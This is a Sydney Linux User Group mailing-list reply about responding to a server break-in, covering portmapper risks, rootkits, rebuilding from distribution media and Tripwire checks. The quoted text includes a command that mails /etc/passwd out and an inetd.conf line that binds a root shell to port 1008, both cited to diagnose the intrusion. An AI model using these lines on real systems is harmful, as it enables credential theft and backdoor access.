Hi Everyone,
> From: Umar Goldeli <[EMAIL PROTECTED]>
> To: Sean Carmody <[EMAIL PROTECTED]>
> Subject: Re: [SLUG] Security Breach
>
> > Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
> > getport(status): request from unauthorized host
>
> Why are you rnning the portmapper? Turn it off if youdon't specifically
> need it.
I would agree with you on this one. RPC services is a favourite for script-
kiddies, and buffer overflows will often give remote root access.
> a "netstat -an | grep LISTEN" will show you "evilthings(tm)" ;)
Not necessarily. Some rootkits have nobbled the "netstat", "ps" and other
system binaries, so that they don't show up suspicious processes/listening
ports/logged in users.
> Remember - root access is generally the *eventual* goal... just because he
> got in as userx, doesn't mean he has root, or even a shell for that
> matter.
Yes, it is the eventual goal, but on some occasions, they get it first up.
If anyone has managed to get access illegally, you _MUST_ assume that they have
root access. There is no way you can assume that they got in as a normal user,
and managed to find a way to access privileged information.
> It could be as simple as a buffer oveflow with something like
> "/bin/mailx < /etc/passwd [EMAIL PROTECTED]" etc.. (or somehting like
> that)..
Yes, there are many forms of "compromise" available. If the attacker is able
to run a command as root (which it seems they have been able to do in order to
get access to /etc/shadow), you must assume that they have been able to
compromise the machine in a way as to provide remote shell access. There are
several backdoor proggies available to the script kiddies to assist them to do
this.
> It could be anything.. either way - you know that something has
> happened. Make an executive decision to decide if it has (I think it
> has) and pull the box from production, rebuild it, secure it, patch it,
> then change all user passwords (if any).
If possible it would be good to pull the box out, and compare the system to the
distribution RPMS - you can compare the RPMS and see if anything has changed.
That way, you can send information to AusCERT and CERT.
Then you rebuild from distribution media. I wouldn't rely on backups, as you
don't know exactly when they managed to hack into your machine.
> From: Simon Bowden <[EMAIL PROTECTED]>
> Subject: Re: [SLUG] Security Breach
> I think this is because somewhere in teh process of getting in,
> they broke my local named (i wasnt working in the morning) - that or
> somewhere upstream someone hurt DNS - I was getting a lot of "Lame
> server
Sounds like they are using BIND exploits.
> The ISP I was on was Telstra bigpond - if its the same, maybe they were
> scanning that range of addresses.
Bigpond what? Cable, ADSL, dial-up?
Suspiciously, this afternoon their ADSL service went on the blink. I wonder
whether that outage is connected or not...
> The other change I found was the following entry on the end of
> /etc/inetd.conf:
> 1008 stream tcp nowait root /bin/sh sh
>
> which you may want to check for and remove/comment.
I would remove it - in fact a rebuild should be the only option at this point,
as you can't be sure of anything on the system anymore.
> The fact taht they edited /etc/inetd.conf and cat-d shadow indicates root
> priveleges. However, there doesnt seem to be any evidence of things inside
> or other changes, so possibly a buffer of exploit type deal?
And you expect them to give you any clues? You should assume that they broke
in, and removed most traces of the hack. A casual inspection would most likely
not show anything to be amiss.
However, if you have Tripwire or something similar, you can determine which
files have been changed.
Another thing to consider is to use IP Chains or IP Tables or something to
provide some form of defense against portscans and stuff. It's not going to
stop them cold, but it can help slow them down.
Rebecca Richards, CCSA CCSE, Unix/Security Consultant, e-Secure Pty Ltd
"Secure in a Networked World" Phone: (02) 9438 4984 Fax: (02) 9438 4986
Suite 201, 2-4 Pacific Highway Mobile: 0412 823 206
St Leonards NSW Australia Email: [EMAIL PROTECTED]
ACN 068 798 194 http://www.e-secure.com.au
--
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug